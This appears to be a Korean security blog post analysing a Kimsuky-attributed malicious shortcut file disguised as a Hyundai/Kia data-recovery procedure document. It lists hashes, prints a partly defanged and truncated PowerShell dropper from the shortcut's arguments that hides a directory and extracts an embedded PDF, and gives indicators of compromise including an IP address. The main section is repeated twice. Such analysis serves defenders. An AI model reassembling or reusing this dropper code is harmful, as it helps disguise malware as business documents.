김수키(Kimsuky) 에서 제작한 악성코드-현대 데이터 복구 및 절차 수립
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 제작한 악성코드인 현대 데이터 복구 및 절차 수립에 대해 알아보겠습니다. 일단 생성되는 내용을 보면 현대자동차·기아 데이터 복구 및 절차 수립 관련 내용인데…. 일단 원청이 해킹을 당했는지 아니면 하청을 해킹을 당했는지 아니면 어떤 분께서 이야기한 우리 북한? 에서 제작한 것이 알 수가 없는지라. 그냥 있는 그대로 글자를 적을 것입니다.
먼저 해시
파일명:현대 데이터 복구 및 절차 수립.lnk
사이즈:52 MB
MD5:75712ce08f5c6c78b3ba8ff94d8ee264
SHA-1:553616ae94ec7e7fb97f886bb5c4e66f4e4136e9
SHA-256:e44f8592680fd14373a51b9667c6e6e4ca47f84d16c1437e20d4d1bea2c6bfee
무려 52MB에 달하는 내용으로 구성되어 있으며 당연히 해당 파일은 PDF가 포함돼 있습니다.
악성코드 PowerShell
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow6(4)\WindowsP(o)w
erShell\v1.0\*rshell(.)exe /s /b /od') do (c0all %a "$et=@('(.)lnk');$dPo0 = Get-Loc(a)ti
on; if (-not (Test-Path 'C:\tempcaches')) { mkdir 'C:\tempcaches' }; attrib +h +s 'C:\tem
pcaches'; if($dPo0 -Match 'System32' -or $dPo0 -Match 'Program Files') {$dPo0 = '%t(e)mp%'
};$lnPo0 = Get-ChildItem -Path $dPo0 -Recurse *.* -File | where {$_.extension -in $et} | w
here-object {$_.length -eq 0x03380000} | Select-Object -E(x)pandProperty FullName;$lnF0=N
ew-Object System.IO.FileStream($lnPo0, [System.IO.FileMode]::Open, [System.IO.FileAccess]:
:Read);$lnF0.Seek(0x0(0)001046, [System.IO.SeekOrigin]::Begin);$sFo0=New-Object byte[] 0x00
16DCC0;$lnF0.Read($sFo0, 0, 0x0016DCC0);$sPo0 = $lnPo0.replace('(.0lnk','.pdf');sc $sPo0 $s
Fo0 …
먼저 해시
파일명:현대 데이터 복구 및 절차 수립.lnk
사이즈:52 MB
MD5:75712ce08f5c6c78b3ba8ff94d8ee264
SHA-1:553616ae94ec7e7fb97f886bb5c4e66f4e4136e9
SHA-256:e44f8592680fd14373a51b9667c6e6e4ca47f84d16c1437e20d4d1bea2c6bfee
무려 52MB에 달하는 내용으로 구성되어 있으며 당연히 해당 파일은 PDF가 포함돼 있습니다.
악성코드 PowerShell
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow6(4)\WindowsP(o)w
erShell\v1.0\*rshell(.)exe /s /b /od') do (c0all %a "$et=@('(.)lnk');$dPo0 = Get-Loc(a)ti
on; if (-not (Test-Path 'C:\tempcaches')) { mkdir 'C:\tempcaches' }; attrib +h +s 'C:\tem
pcaches'; if($dPo0 -Match 'System32' -or $dPo0 -Match 'Program Files') {$dPo0 = '%t(e)mp%'
};$lnPo0 = Get-ChildItem -Path $dPo0 -Recurse *.* -File | where {$_.extension -in $et} | w
here-object {$_.length -eq 0x03380000} | Select-Object -E(x)pandProperty FullName;$lnF0=N
ew-Object System.IO.FileStream($lnPo0, [System.IO.FileMode]::Open, [System.IO.FileAccess]:
:Read);$lnF0.Seek(0x0(0)001046, [System.IO.SeekOrigin]::Begin);$sFo0=New-Object byte[] 0x00
16DCC0;$lnF0.Read($sFo0, 0, 0x0016DCC0);$sPo0 = $lnPo0.replace('(.0lnk','.pdf');sc $sPo0 $s
Fo0 …
IoC
45.32.133.19
553616ae94ec7e7fb97f886bb5c4e66f4e4136e9
75712ce08f5c6c78b3ba8ff94d8ee264
e44f8592680fd14373a51b9667c6e6e4ca47f84d16c1437e20d4d1bea2c6bfee
553616ae94ec7e7fb97f886bb5c4e66f4e4136e9
75712ce08f5c6c78b3ba8ff94d8ee264
e44f8592680fd14373a51b9667c6e6e4ca47f84d16c1437e20d4d1bea2c6bfee